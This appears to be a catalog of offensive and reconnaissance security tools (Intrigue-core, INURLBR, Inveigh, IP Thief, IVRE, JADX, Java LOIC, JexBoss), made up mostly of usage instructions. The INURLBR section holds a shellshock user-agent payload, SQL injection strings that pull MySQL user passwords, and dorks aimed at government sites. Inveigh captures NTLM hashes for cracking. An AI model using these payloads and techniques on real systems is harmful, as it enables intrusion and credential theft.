gist.github.com
192.30.252.141 - gist.github.com
guides.github.com
199.27.75.133
h5bp.github.com
199.27.75.133
harvesthq.github.com
199.27.75.133
help.github.com
199.27.75.133
hexchat.github.com
199.27.75.133
hubot.github.com
199.27.75.133
ipython.github.com
199.27.75.133
janpaepke.github.com
199.27.75.133
jgilfelt.github.com
199.27.75.133
jobs.github.com
kangax.github.com
199.27.75.133
karlseguin.github.com
199.27.75.133
kouphax.github.com
199.27.75.133
learnboost.github.com
199.27.75.133
liferay.github.com
199.27.75.133
lloyd.github.com
199.27.75.133
mac.github.com
199.27.75.133
mapbox.github.com
199.27.75.133
matplotlib.github.com
199.27.75.133
mbostock.github.com
199.27.75.133
mdo.github.com
199.27.75.133
mindmup.github.com
199.27.75.133
mrdoob.github.com
199.27.75.133
msysgit.github.com
199.27.75.133
nativescript.github.com
199.27.75.133
necolas.github.com
199.27.75.133
nodeca.github.com
199.27.75.133
onedrive.github.com
199.27.75.133
pages.github.com
199.27.75.133
panrafal.github.com
199.27.75.133
parquet.github.com
199.27.75.133
pnts.github.com
199.27.75.133
raw.github.com
199.27.75.133
rg3.github.com
199.27.75.133
rosedu.github.com
199.27.75.133
schacon.github.com
199.27.75.133
scottjehl.github.com
199.27.75.133
shop.github.com
192.30.252.129 - github.com
shopify.github.com
199.27.75.133
status.github.com
thoughtbot.github.com
199.27.75.133
tomchristie.github.com
199.27.75.133
training.github.com
199.27.75.133
try.github.com
199.27.75.133
twbs.github.com
199.27.75.133
twitter.github.com
199.27.75.133
visualstudio.github.com
54.192.134.13 server-54-192-134-13.syd1.r.cloudfront.net
wagerfield.github.com
199.27.75.133
webcomponents.github.com
199.27.75.133
webpack.github.com
199.27.75.133
weheart.github.com
199.27.75.133
# Reverse DNS lookup on range 192.30.252.0/22

192.30.252.80 - ns1.github.com
192.30.252.81 - ns2.github.com
192.30.252.86 - live.github.com
192.30.252.97 - ops-lb-ip1.iad.github.com
192.30.252.98 - ops-lb-ip2.iad.github.com
192.30.252.128 - github.com
192.30.252.129 - github.com
192.30.252.130 - github.com
192.30.252.131 - github.com
192.30.252.132 - assets.github.com
192.30.252.136 - api.github.com
192.30.252.137 - api.github.com
192.30.252.138 - api.github.com
192.30.252.139 - api.github.com
192.30.252.144 - codeload.github.com
192.30.252.148 - ssh.github.com
192.30.252.149 - ssh.github.com
192.30.252.150 - ssh.github.com
192.30.252.151 - ssh.github.com
192.30.252.152 - pages.github.com
192.30.252.156 - githubusercontent.github.com
192.30.252.192 - github-smtp2-ext1.iad.github.net
192.30.253.1 - ops-puppetmaster1-cp1-prd.iad.github.com
192.30.253.2 - janky-nix101-cp1-prd.iad.github.com
192.30.253.10 - gw.internaltools-esx1-cp1prd.iad.github.com
192.30.253.11 - janky-chromium101-cp1-prd.iad.github.com
192.30.253.12 - gw.internaltools-esx2-cp1prd.iad.github.com
192.30.253.13 - github-mon2ext-cp1-prd.iad.github.net
192.30.253.16 - github-smtp2a-ext-cp1-prd.iad.github.net
192.30.253.17 - github-smtp2b-ext-cp1-prd.iad.github.net
192.30.253.23 - ops-bastion1-cp1-prd.iad.github.com
192.30.253.30 - github-slowsmtp1-ext-cp1prd.iad.github.net
192.30.254.1 - github-lb3a-cp1-prd.iad.github.com
192.30.254.2 - github-lb3b-cp1-prd.iad.github.com
192.30.254.3 - github-lb3c-cp1-prd.iad.github.com
192.30.254.4 - github-lb3d-cp1-prd.iad.github.com
# Saving output csv file
# Done
Download InstaRecon
INTRIGUE - INTELLIGENCE GATHERING FRAMEWORK
Intrigue-core is an API-first intelligence gathering framework for

Internet reconnaissance and research.
Setting up a development environment
The following are presumed available and configured in your

environment
redis
sudo
nmap
zmap
masscan
java runtime
Sudo is used to allow root access for certain commands ^ , so
make sure this doesn't require a password:

your-username ALL = NOPASSWD: /usr/bin/masscan, /usr/
sbin/zmap, /usr/bin/nmap
Starting up...
Make sure you have redis installed and running. (Use

Homebrew if you're on OSX).
Install all gem dependencies with Bundler (http://bundler.io/)
$ bundle install
Start the web and background workers. Intrigue will start on

127.0.0.0:7777.
$ foreman start
Now, browse to the web interface.

Using the web interface
To use the web interface, browse to http://127.0.0.1:7777

Getting started should be pretty straightforward, try running a
"dns_brute_sub" task on your domain. Now, try with the
"use_file" option set to true.
API usage via core-cli:
A command line utility has been added for convenience, corecli.

List all available tasks:
$ bundle exec ./core-cli.rb list
Start a task:
$ bundle exec ./core-cli.rb start dns_lookup_forward
DnsRecord#intrigue.io
Start a task with options:

$ bundle exec ./core-cli.rb start dns_brute_sub
resolver=8.8.8.8#brute_list=1,2,3,4,www#use_permutations=
true
[+] Starting task
[+] Task complete!
[+] Start Results
DnsRecord#www.intrigue.io
IpAddress#192.0.78.13
[ ] End Results
[+] Task Log:
[ ] : Got allowed option: resolver
[ ] : Allowed option:
{:name=>"resolver", :type=>"String", :regex=>"ip_address"
, :default=>"8.8.8.8"}
[ ] : Regex should match an IP Address
[ ] : No need to convert resolver to a string
[+] : Allowed user_option! {"name"=>"resolver",
"value"=>"8.8.8.8"}
[ ] : Got allowed option: brute_list
{:name=>"brute_list", :type=>"String", :regex=>"alpha_num
eric_list", :default=>["mx", "mx1", "mx2", "www", "ww2",
"ns1", "ns2", "ns3", "test", "mail", "owa", "vpn",
"admin", "intranet", "gateway", "secure", "admin",
"service", "tools", "doc", "docs", "network", "help",
"en", "sharepoint", "portal", "public", "private", "pub",
"zeus", "mickey", "time", "web", "it", "my", "photos",
"safe", "download", "dl", "search", "staging"]}
[ ] : Regex should match an alpha-numeric list
[ ] : No need to convert brute_list to a string
[+] : Allowed user_option! {"name"=>"brute_list",
"value"=>"1,2,3,4,www"}
[ ] : Got allowed option: use_permutations

{:name=>"use_permutations", :type=>"Boolean", :regex=>"bo
olean", :default=>true}
[ ] : Regex should match a boolean
[+] : Allowed user_option! {"name"=>"use_permutations",
"value"=>true}
[ ] : user_options: [{"resolver"=>"8.8.8.8"},
{"brute_list"=>"1,2,3,4,www"},
{"use_permutations"=>true}]
[ ] : Task: dns_brute_sub
[ ] : Id: fddc7313-52f6-4d5a-9aad-fd39b0428ca5
[ ] : Task entity: {"type"=>"DnsRecord",
"attributes"=>{"name"=>"intrigue.io"}}
[ ] : Task options: [{"resolver"=>"8.8.8.8"},
{"brute_list"=>"1,2,3,4,www"},
{"use_permutations"=>true}]
[ ] : Option configured: resolver=8.8.8.8
[ ] : Option configured: use_file=false
[ ] : Option configured: brute_file=dns_sub.list
[ ] : Option configured: use_mashed_domains=false
[ ] : Option configured: brute_list=1,2,3,4,www
[ ] : Option configured: use_permutations=true
[ ] : Using provided brute list
[+] : Using subdomain list: ["1", "2", "3", "4", "www"]
[+] : Looks like no wildcard dns. Moving on.
[-] : Hit exception: no address for 1.intrigue.io
[+] : Resolved Address 192.0.78.13 for www.intrigue.io

[+] : Creating entity: DnsRecord,
{:name=>"www.intrigue.io"}
[+] : Creating entity: IpAddress, {:name=>"192.0.78.13"}
[ ] : Adding permutations: www1, www2
[-] : Hit exception: no address for www1.intrigue.io
[-] : Hit exception: no address for www2.intrigue.io
[+] : Ship it!
[ ] : Sending to Webhook: http://localhost:7777/v1/
task_runs/fddc7313-52f6-4d5a-9aad-fd39b0428ca5
Check for a list of subdomains on intrigue.io:

$ bundle exec ./core-cli.rb start dns_brute_sub
resolver=8.8.8.8#brute_list=a,b,c,proxy,test,www
Check the Alexa top 1000 domains for the existence of security
headers:
$ for x in `cat data/domains.txt | head -n 1000`; do
bundle exec ./core-cli.rb start dns_brute_sub DnsRecord#
$x;done
API usage via rubygem

$ gem install intrigue
$ irb
> require 'intrigue'
> x =
Intrigue.new
# Create an entity hash, must have a :type key

# and (in the case of most tasks)
a :attributes key
# with a hash containing a :name key (as shown below)
> entity = {
:type => "String",
:attributes => { :name => "intrigue.io"}
}
# Create a list of options (this can be empty)
> options_list = [
{ :name => "resolver", :value => "8.8.8.8" }
]
> x.start "example", entity_hash, options_list
> id
= x.start "example", entity_hash, options_list
> puts x.get_log id

> puts x.get_result id
API usage via curl:
You can use the tried and true curl utility to request a task run.
Specify the task type, specify an entity, and the appropriate
options:
$ curl -s -X POST -H "Content-Type: application/json" -d
'{ "task": "example", "entity": { "type": "String",
"attributes": { "name": "8.8.8.8" } }, "options": {} }'
http://127.0.0.1:7777/v1/task_runs
Download Intrigue-core
INURLBR - ADVANCED SEARCH IN MULTIPLE SEARCH
ENGINES
Advanced search in search engines, enables analysis provided

to exploit GET / POST capturing emails & urls, with an internal
custom validation junction for each target / url found.
INURLBR scanner was developed by Cleiton Pinheiro, owner
and founder of INURL - BRASIL.
Tool made in PHP that can run on different Linux distributions
helps hackers / security professionals in their specific searches.
With several options are automated methods of exploration,
AND SCANNER is known for its ease of use and performasse.
The inspiration to create the inurlbr scanner, was the XROOT
Scan 5.2 application.
Long desription
The INURLBR tool was developed aiming to meet the need of
Hacking community.
Purpose: Make advanced searches to find potential
vulnerabilities in web applications known as Google Hacking
with various options and search filters, this tool has an absurd
power of search engines available with (24) + 6 engines
special(deep web)
- Possibility generate IP ranges or random_ip and
analyze their targets.
- Customization of HTTP-HEADER, USER-AGET, URLREFERENCE.
- Execution external to exploit certain targets.
- Generator dorks random or set file dork.
- Option to set proxy, file proxy list, http proxy, file http
proxy.
- Set time random proxy.
- It is possible to use TOR ip Random.
- Debug processes urls, http request, process irc.

- Server communication irc sending vulns urls for chat
room.
- Possibility injection exploit GET / POST => SQLI, LFI,
LFD.
- Filter and validation based regular expression.
- Extraction of email and url.
- Validation using http-code.
- Search pages based on strings file.
- Exploits commands manager.
- Paging limiter on search engines.
- Beep sound when trigger vulnerability note.
- Use text file as a data source for urls tests.
- Find personalized strings in return values of the tests.
- Validation vulnerability shellshock.
- File validation values wordpress wp-config.php.
- Execution sub validation processes.
- Validation syntax errors database and programmin.
- Data encryption as native parameter.
- Random google host.
- Scan port.
- Error Checking & values :
LIB & PERMISSION:
PHP Version 5.4.7
php5-curl LIB
php5-cli LIB
cURL support enabled
cURL Information 7.24.0
allow_url_fopen On
permission Reading & Writing
User root privilege, or is in the sudoers group
Operating system LINUX
Proxy random TOR
PERMISSION EXECUTION: chmod +x inurlbr.php
INSTALLING LIB CURL: sudo apt-get install php5-curl
INSTALLING LIB CLI: sudo apt-get install php5-cli
INSTALLING PROXY TOR https://www.torproject.org/

docs/debian.html.en
resume: apt-get install curl libcurl3 libcurl3-dev php5

php5-cli php5-curl
Help:
-h
--help
Alternative long length help command.
--ajuda
Command to specify Help.
--info
Information script.
--update Code update.

-q
Choose which search engine you want through
[1...24] / [e1..6]]:
[options]:
1
- GOOGLE / (CSE) GENERIC RANDOM / API
- BING
- YAHOO BR
- ASK
- HAO123 BR
- GOOGLE (API)
- LYCOS
- UOL BR
- YAHOO US
10
- SAPO
11
- DMOZ
12
- GIGABLAST
13
- NEVER
14
- BAIDU BR
15
- YANDEX
16
- ZOO
17
- HOTBOT
18
- ZHONGSOU
19
- HKSEARCH
20
- EZILION
21
- SOGOU
22
- DUCK DUCK GO
23
- BOOROW
24
- GOOGLE(CSE) GENERIC RANDOM
---------------------------------------SPECIAL MOTORS
---------------------------------------e1
- TOR FIND
e2
- ELEPHANT
e3
- TORSEARCH
e4
- WIKILEAKS
e5
- OTN
e6
- EXPLOITS SHODAN
---------------------------------------all - All search engines / not special motors

Default:
Example: -q {op}
Usage:
-q 1
-q 5
Using more than one engine:
-q
1,2,5,6,11,24
Using all engines:
-q all
--proxy Choose which proxy you want to use through the

search engine:
Example: --proxy {proxy:port}
Usage:
--proxy localhost:8118
--proxy socks5://googleinurl@localhost:9050
--proxy http://admin:12334@172.16.0.90:8080
--proxy-file Set font file to randomize your proxy to
each search engine.
Example: --proxy-file {proxys}
Usage:
--proxy-file proxys_list.txt
--time-proxy Set the time how often the proxy will be

exchanged.
Example: --time-proxy {second}
Usage:
--time-proxy 10
--proxy-http-file Set file with urls http proxy,

are used to bular capch search engines
Example: --proxy-http-file {youfilehttp}
Usage:
--proxy-http-file http_proxys.txt
--tor-random Enables the TOR function, each usage links

an unique IP.
-t
Choose the validation type: op 1, 2, 3, 4, 5

[options]:
1
- The first type uses default errors considering
the script:
It establishes connection with the exploit through
the get method.
Demo: www.alvo.com.br/pasta/index.php?id={exploit}
The second type tries to valid the error
defined by: -a='VALUE_INSIDE_THE _TARGET'

It also establishes connection with the exploit
through the get method
Demo: www.alvo.com.br/pasta/index.php?id={exploit}
3
- The third type combine both first and second
types:
Then, of course, it also establishes connection with
the exploit through the get method
Demo: www.target.com.br{exploit}
Default:
Example: -t {op}
Usage:
4
-t 1
- The fourth type a validation based on source
file and will be enabled scanner standard functions.

The source file their values are concatenated with
target url.
- Set your target with command --target {http://
target}
- Set your file with command -o {file}
Explicative:
Source file values:
/admin/index.php?id=
/pag/index.php?id=
/brazil.php?new=
Demo:
www.target.com.br/admin/index.php?id={exploit}
www.target.com.br/pag/index.php?id={exploit}
www.target.com.br/brazil.php?new={exploit}
5
- (FIND PAGE) The fifth type of validation based
on the source file,

Will be enabled only one validation code 200 on the
target server, or if the url submit such code will be
considered vulnerable.
- Set your target with command --target {http://
target}
- Set your file with command -o {file}
Explicative:
Source file values:
/admin/admin.php
/admin.asp
/admin.aspx
Demo:
www.target.com.br/admin/admin.php
www.target.com.br/admin.asp
www.target.com.br/admin.aspx
Observation: If it shows the code 200 will be
separated in the output file
DEFAULT ERRORS:
[*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION,
[*]ZIMBRA MAIL,
[*]ERROR MARIADB,
[*]ERROR JBOSSWEB,
[*]ERROR ODBC,
[*]ZEND FRAMEWORK,
[*]ERROR MYSQL,
[*]ERROR MICROSOFT,
[*]ERROR POSTGRESQL,
[*]ERROR JAVA INFINITYDB, [*]ERROR PHP,
[*]CMS WORDPRESS,
[*]ERROR JDBC,
[*]ERROR ASP,
[*]ERROR ORACLE,
CFM,
[*]SHELL WEB,
[*]ERROR DB2,
[*]JDBC
[*]ERROS LUA,
[*]ERROR INDEFINITE
--dork Defines which dork the search engine will use.

Example: --dork {dork}
Usage:
--dork 'site:.gov.br inurl:php? id'
- Using multiples dorks:

Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
Usage:
--dork '[DORK]site:br[DORK]site:ar
inurl:php[DORK]site:il inurl:asp'
--dork-file Set font file with your search dorks.
Example: --dork-file {dork_file}
Usage:
--dork-file 'dorks.txt'
--exploit-get Defines which exploit will be injected

through the GET method to each URL found.
Example: --exploit-get {exploit_get}
Usage:
--exploit-get "?'%270x27;"
--exploit-post Defines which exploit will be injected

through the POST method to each URL found.
Example: --exploit-post {exploit_post}
Usage:
--exploit-post
'field1=valor1&field2=valor2&field3=?
0x273exploit;&botao=ok'
--exploit-command Defines which exploit/parameter will

be executed in the options: --command-vul/ --command-all.
The exploit-command will be identified by the
paramaters: --command-vul/ --command-all as _EXPLOIT_
Ex --exploit-command '/admin/config.conf' --commandall 'curl -v _TARGET__EXPLOIT_'
_TARGET_ is the specified URL/TARGET obtained by the
process
_EXPLOIT_ is the exploit/parameter defined by the
option --exploit-command.
Example: --exploit-command {exploit-command}
Usage:
-a
--exploit-command '/admin/config.conf'
Specify the string that will be used on the search
script:
Example: -a {string}
Usage:
-d
-a '<title>hello world</title>'
Specify the script usage op 1, 2, 3, 4, 5.

Example: -d {op}
Usage:
-d 1 /URL of the search engine.

-d 2 /Show all the url.
-d 3 /Detailed request of every URL.
-d 4 /Shows the HTML of every URL.
-d 5 /Detailed request of all URLs.
-d 6 /Detailed PING - PONG irc.
-s
Specify the output file where it will be saved the
vulnerable URLs.
Example: -s {file}
Usage:
-o
-s your_file.txt
Manually manage the vulnerable URLs you want to use
from a file, without using a search engine.

Example: -o {file_where_my_urls_are}
Usage:
--persist
-o tests.txt
Attempts when Google blocks your search.
The script tries to another google host / default =

4
Example: --persist {number_attempts}
Usage:
--ifredirect
--persist 7
Return validation method post REDIRECT_URL
Example: --ifredirect {string_validation}

Usage:
--ifredirect '/admin/painel.php'
-m
Enable the search for emails on the urls specified.
-u
Enables the search for URL lists on the url
specified.
--gc Enable validation of values with google webcache.
--pr
Progressive scan, used to set operators (dorks),

makes the search of a dork and valid results, then
goes a dork at a time.
--file-cookie Open cookie file.

--save-as Save results in a certain place.
--shellshock Explore shellshock vulnerability by setting
a malicious user-agent.
--popup Run --command all or vuln in a parallel
terminal.
--cms-check Enable simple check if the url / target is
using CMS.
--no-banner Remove the script presentation banner.
--unique Filter results in unique domains.
--beep Beep sound when a vulnerability is found.
--alexa-rank Show alexa positioning in the results.
--robots Show values file robots.
--range Set range IP.
Example: --range {range_start,rage_end}
Usage:
--range '172.16.0.5#172.16.0.255'
--range-rand Set amount of random ips.

Example: --range-rand {rand}
Usage:
--range-rand '50'
--irc Sending vulnerable to IRC / server channel.

Example: --irc {server#channel}
Usage:
--irc 'irc.rizon.net#inurlbrasil'
--http-header Set HTTP header.

Example: --http-header {youemail}
Usage:
--http-header 'HTTP/1.1 401
Unauthorized,WWW-Authenticate: Basic realm="Top Secret"'

--sedmail Sending vulnerable to email.
Example: --sedmail {youemail}
Usage:
--sedmail youemail@inurl.com.br
--delay Delay between research processes.

Example: --delay {second}
Usage:
--delay 10
--time-out Timeout to exit the process.

Example: --time-out {second}
Usage:
--time-out 10
--ifurl Filter URLs based on their argument.

Example: --ifurl {ifurl}
Usage:
--ifurl index.php?id=
--ifcode Valid results based on your return http code.

Example: --ifcode {ifcode}
Usage:
--ifcode 200
--ifemail Filter E-mails based on their argument.

Example: --ifemail {file_where_my_emails_are}
Usage:
--ifemail sp.gov.br
--url-reference Define referring URL in the request to

send him against the target.
Example: --url-reference {url}
Usage:
--url-reference http://target.com/admin/
user/valid.php
--mp Limits the number of pages in the search engines.
Example: --mp {limit}
Usage:
--mp 50
--user-agent Define the user agent used in its request

against the target.
Example: --user-agent {agent}
Usage:
--user-agent 'Mozilla/5.0 (X11; U; Linux
i686) Gecko/20071127 Firefox/2.0.0.11'

Usage-exploit / SHELLSHOCK:
--user-agent '() { foo;};echo; /bin/bash -c "expr
299663299665 / 3; echo CMD:;id; echo END_CMD:;"'
Complete command:
php inurlbr.php --dork '_YOU_DORK_' -s
shellshock.txt --user-agent '_YOU_AGENT_XPL_SHELLSHOCK' t 2 -a '99887766555'
--sall Saves all urls found by the scanner.
Example: --sall {file}
Usage:
--sall your_file.txt
--command-vul Every vulnerable URL found will execute

this command parameters.
Example: --command-vul {command}
Usage:
--command-vul 'nmap sV -p 22,80,21
_TARGET_'
--command-vul './exploit.sh _TARGET_
output.txt'
--command-vul 'php miniexploit.php -t
_TARGET_ -s output.txt'
--command-all Use this commmand to specify a single
command to EVERY URL found.
Example: --command-all {command}
Usage:
--command-all 'nmap sV -p 22,80,21
_TARGET_'
--command-all './exploit.sh _TARGET_
output.txt'
--command-all 'php miniexploit.php -t
[!] Observation:
_TARGET_ will be replaced by the URL/target found,
although if the user
doesn't input the get, only the domain will be
executed.
_TARGETFULL_ will be replaced by the original URL /
target found.
_TARGETXPL_ will be replaced by the original URL /

target found + EXPLOIT --exploit-get.
_TARGETIP_ return of ip URL / target found.
_URI_ Back URL set of folders / target found.
_RANDOM_ Random strings.
_PORT_ Capture port of the current test, within the
--port-scan process.
_EXPLOIT_
will be replaced by the specified command
argument --exploit-command.
The exploit-command will be identified by the
parameters --command-vul/ --command-all as _EXPLOIT_
--replace Replace values in the target URL.
Example:
Usage:
--replace {value_old[INURL]value_new}
--replace 'index.php?id=[INURL]index.php?
id=1666+and+(SELECT+user,Password+from+mysql.user+limit
+0,1)=1'
--replace 'main.php?id=[INURL]main.php?
id=1+and+substring(@@version,1,1)=1'
--replace 'index.aspx?id=[INURL]index.aspx?
id=1%27'
--remove Remove values in the target URL.
Example: --remove {string}
Usage:
--remove '/admin.php?id=0'
--regexp Using regular expression to validate his

research, the value of the
Expression will be sought within the target/URL.
Example:
--regexp {regular_expression}
All Major Credit Cards:

Usage:
--regexp '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5]
[0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|
3[47][0-9]{13})'
IP Addresses:
Usage:
--regexp '((?:(?:25[0-5]|2[0-4][0-9]|[01]?
[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9]
[0-9]?))'
EMAIL:
Usage:
--regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'
---regexp-filter Using regular expression to filter his

research, the value of the
Expression will be sought within the target/URL.
Example:
---regexp-filter {regular_expression}
EMAIL:
Usage:
---regexp-filter '([\w\d\.\-\_]+)@([\w\d\.
\_\-]+)'
[!] Small commands manager:
--exploit-cad Command register for use within the

scanner.
Format {TYPE_EXPLOIT}::{EXPLOIT_COMMAND}
Example Format: NMAP::nmap -sV _TARGET_
Example Format: EXPLOIT1::php xpl.php -t _TARGET_ -s
output.txt
Usage:
--exploit-cad 'NMAP::nmap -sV _TARGET_'
Observation: Each registered command is identified by

an id of your array.
Commands are logged in exploits.conf
file.
--exploit-all-id Execute commands, exploits based on id
of use,
(all) is run for each target found by the engine.
Example: --exploit-all-id {id,id}
Usage:
--exploit-all-id 1,2,8,22
--exploit-vul-id Execute commands, exploits based on id

of use,
(vull) run command only if the target was considered
vulnerable.
Example: --exploit-vul-id {id,id}
Usage:
--exploit-vul-id 1,2,8,22
--exploit-list List all entries command in exploits.conf

file.
[!] Running subprocesses:
--sub-file
Subprocess performs an injection
strings in URLs found by the engine, via GET or

POST.
Example: --sub-file {youfile}
Usage:
--sub-file exploits_get.txt
--sub-get defines whether the strings coming from

--sub-file will be injected via GET.
Usage:
--sub-get
--sub-post defines whether the strings coming from

--sub-file will be injected via POST.
Usage:
--sub-get
--sub-cmd-vul Each vulnerable URL found within the subprocess

will execute the parameters of this command.
Example: --sub-cmd-vul {command}
Usage:
--sub-cmd-vul 'nmap sV -p 22,80,21
_TARGET_'
--sub-cmd-vul './exploit.sh _TARGET_
output.txt'
--sub-cmd-vul 'php miniexploit.php -t
--sub-cmd-all Run command to each target found within
the sub-process scope.
Example: --sub-cmd-all {command}
Usage:
--sub-cmd-all 'nmap sV -p 22,80,21
_TARGET_'
--sub-cmd-all './exploit.sh _TARGET_
output.txt'
--sub-cmd-all 'php miniexploit.php -t
--port-scan Defines ports that will be validated as

open.
Example: --port-scan {ports}
Usage:
--port-scan '22,21,23,3306'
--port-cmd Define command that runs when finding an open

door.
Example: --port-cmd {command}
Usage:
--port-cmd './xpl _TARGETIP_:_PORT_'

--port-cmd './xpl _TARGETIP_/file.php?
sqli=1'
--port-write Send values for door.
Example: --port-write {'value0','value1','value3'}
Usage:
--port-write "'NICK nk_test','USER nk_test
8 * :_ola','JOIN #inurlbrasil','PRIVMSG #inurlbrasil :

minha_msg'"
[!] Modifying values used within script parameters:
md5 Encrypt values in md5.

Example: md5({value})
Usage:
md5(102030)
Usage:
--exploit-get 'user?id=md5(102030)'
base64 Encrypt values in base64.

Example: base64({value})
Usage:
base64(102030)
Usage:
--exploit-get 'user?id=base64(102030)'
hex Encrypt values in hex.

Example: hex({value})
Usage:
hex(102030)
Usage:
--exploit-get 'user?id=hex(102030)'
Generate random values.

Example: random({character_counter})
Usage:
random(8)
Usage:
--exploit-get 'user?id=random(8)'
Usage
To get a list of basic options and switches use:
php inurlbr.php -h
To get a list of all options and switches use:

python inurlbr.php --help
DownloadINURLBR
INVEIGH - A WINDOWS POWERSHELL LLMNR/NBNS
SPOOFER WITH CHALLENGE/RESPONSE CAPTURE

OVER HTTP/SMB
Inveigh is a Windows PowerShell LLMNR/NBNS spoofer

designed to assist penetration testers that find themselves
limited to a Windows system. This can commonly occur while
performing phishing attacks, USB drive attacks, VLAN pivoting,
or simply being restricted to a Windows system as part of client
imposed restrictions.
Notes
1. Currently supports IPv4 LLMNR/NBNS spoofing and

HTTP/SMB NTLMv1/NTLMv2 challenge/response
capture.
2. LLMNR/NBNS spoofing is performed through sniffing and
sending with raw sockets.
3. SMB challenge/response captures are performed by
sniffing over the host system's SMB service.
4. HTTP challenge/response captures are performed with a
dedicated listener.
5. The local LLMNR/NBNS services do not need to be
disabled on the host system.
6. LLMNR/NBNS spoofer will point victims to host system's
SMB service, keep account lockout scenarios in mind.
7. Kerberos should downgrade for SMB authentication due
to spoofed hostnames not being valid in DNS.
8. Ensure that the LMMNR,NBNS,SMB,HTTP ports are open
within any local firewall on the host system.
9. Output files will be created in current working directory.
10. If you copy/paste challenge/response captures from
output window for password cracking, remove carriage
returns.
Usage
Obtain an elevated administrator or SYSTEM shell. If

necessary, use a method to bypass script execution policy.
To execute with default settings:
Inveigh.ps1 -i localip
To execute with features enabled/disabled:

Inveigh.ps1 -i localip -LLMNR Y/N -NBNS Y/N -HTTP Y/N HTTPS Y/N -SMB Y/N -Repeat Y/N -ForceWPADAuth Y/N
DownloadInveigh
IP THIEF - SIMPLE IP STEALER IN PHP
A simple PHP script to capture the IP address of anyone that

send the "imagen.php" file with the following options:
[+] It comes with an administrator to view and delete IP

[+] You can change the redirect URL image
[+] Can you see the country of the visitor
Download IP Thief
IVRE - A PYTHON NETWORK RECON FRAMEWORK,
BASED ON NMAP, BRO & P0F
IVRE (Instrument de veille sur les rseaux extrieurs) or

DRUNK (Dynamic Recon of UNKnown networks) is a network
recon framework, including two modules for passive recon (one
p0f-based and one Bro-based) and one module for active recon
(mostly Nmap-based, with a bit of ZMap).
The advertising slogans are:
(in French): IVRE, il scanne Internet.

(in English): Know the networks, get DRUNK!
The names IVRE and DRUNK have been chosen as a tribute to
"Le Taullier".
External programs / dependencies
IVRE relies on:

Python 2, version 2.6 minimum
the Crypto module
the pymongo module, version 2.7.2 minimum.
Nmap & ZMap
Bro & p0f
MongoDB, version 2.6 minimum
a web server (successfully tested with Apache and Nginx,
should work with anything capable of serving static files
and run a Python-based CGI), although a test web server
is now distributed with IVRE (httpd-ivre)
a web browser (successfully tested with recent versions of
Firefox and Chromium)
Maxmind GeoIP free databases
optionally Tesseract, if you plan to add screenshots to
your Nmap scan results
optionally Docker & Vagrant (version 1.6 minimum)
IVRE comes with (refer to the LICENSE-EXTERNAL file for the
licenses):
AngularJS
Twitter Bootstrap
jQuery
D3.js
flag-icon-css
Passive recon
The following steps will show some examples of passive
network recon with IVRE. If you only want active (for example,
Nmap-based) recon, you can skip this part.

Using Bro
You need to run bro (2.3 minimum) with the option -b and the
location of the passiverecon.bro file. If you want to run it on
the eth0 interface, for example, run:
# mkdir logs
# bro -b /usr/local/share/ivre/passiverecon/
passiverecon.bro -i eth0
If you want to run it on the capture file (capture needs to a

PCAP file), run:
$ mkdir logs
$ bro -b /usr/local/share/ivre/passiverecon/
passiverecon.bro -r capture
This will produce log files in the logs directory. You need to run
a passivereconworker to process these files. You can try:
$ passivereconworker --directory=logs
This program will not stop by itself. You can (p)kill it, it will
stop gently (as soon as it has finished to process the current
file).
Using p0f
To start filling your database with information from the eth0

interface, you just need to run (passiverecon is just a sensor
name here):
# p0f2db -s passiverecon iface:eth0
And from the same capture file:

$ p0f2db -s passiverecon capture
Using the results
You have two options for now:

the ipinfo command line tool
the db.passive object of the ivre.db Python module

For example, to show everything stored about an IP address or
a network:
$ ipinfo 1.2.3.4
$ ipinfo 1.2.3.0/24
See the output of ipinfo --help.

To use the Python module, run for example:
$ python
>>> from ivre.db import db
>>> db.passive.get(db.passive.flt_empty)[0]
For more, run help(db.passive) from the Python shell.
Active recon
Scanning
The easiest way is to install IVRE on the "scanning" machine

and run:
# runscans --routable --limit 1000 --output=XMLFork
This will run a standard scan against 1000 random hosts on the
Internet by running 30 nmap processes in parallel. See the
output of runscans --help if you want to do something else.
When it's over, to import the results in the database, run:
$ nmap2db -c ROUTABLE-CAMPAIGN-001 -s MySource -r scans/
ROUTABLE/up
Here, ROUTABLE-CAMPAIGN-001 is a category (just an arbitrary

name that you will use later to filter scan results) and MySource
is a friendly name for your scanning machine (same here, an
arbitrary name usable to filter scan results; by default, when
you insert a scan result, if you already have a scan result for
the same host address with the same source, the previous
result is moved to an "archive" collection (fewer indexes) and
the new result is inserted in the database).
There is an alternative to installing IVRE on the scanning
machine that allows to use several agents from one master.
See the AGENT file, the program runscans-agent for the

master and the agent/ directory in the source tree.
Using the results
You have three options:

the scancli command line tool
the db.nmap object of the ivre.db Python module
the web interface
CLI: scancli
To get all the hosts with the port 22 open:
$ scancli --port 22
See the output of scancli --help.

Python module
To use the Python module, run for example:
$ python
>>> from ivre.db import db
>>> db.nmap.get(db.nmap.flt_empty)[0]
For more, run help(db.nmap) from the Python shell.

Web interface
The interface is meant to be easy to use, it has its own
documentation.
DownloadIVRE
JADX - JAVA SOURCE CODE FROM ANDROID DEX AND
APK FILES
Command line and GUI tools for produce Java source code
from Android Dex and Apk files.
Usage
jadx[-gui] [options] <input file> (.dex, .apk, .jar
or .class)
options:
-d, --output-dir
- output directory
-j, --threads-count - processing threads count

-f, --fallback
- make simple dump (using goto
instead of 'if', 'for', etc)

--cfg
- save methods control flow graph to
dot file
--raw-cfg
- save methods control flow graph
(use raw instructions)

-v, --verbose
- verbose output
-h, --help
- print this help
Example:
jadx -d out classes.dex
Download JADX
JAVA LOIC - LOW ORBIT ION CANNON. A JAVA BASED
NETWORK STRESS TESTING APPLICATION
Low Orbit Ion Cannon. The project is a Java implementation of

LOIC written by Praetox but it's not related with the original
project. The main purpose of Java LOIC is testing your
network.
Java LOIC should work on most operating systems.
DownloadJava LOIC
JEXBOSS - JBOSS VERIFY AND EXPLOITATION TOOL
JexBoss is a tool for testing and exploiting vulnerabilities in
JBoss Application Server.
REQUIREMENTS
Python <= 2.7.x
INSTALLATION
To install the latest version of JexBoss, please use the
following commands:
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
python jexboss.py
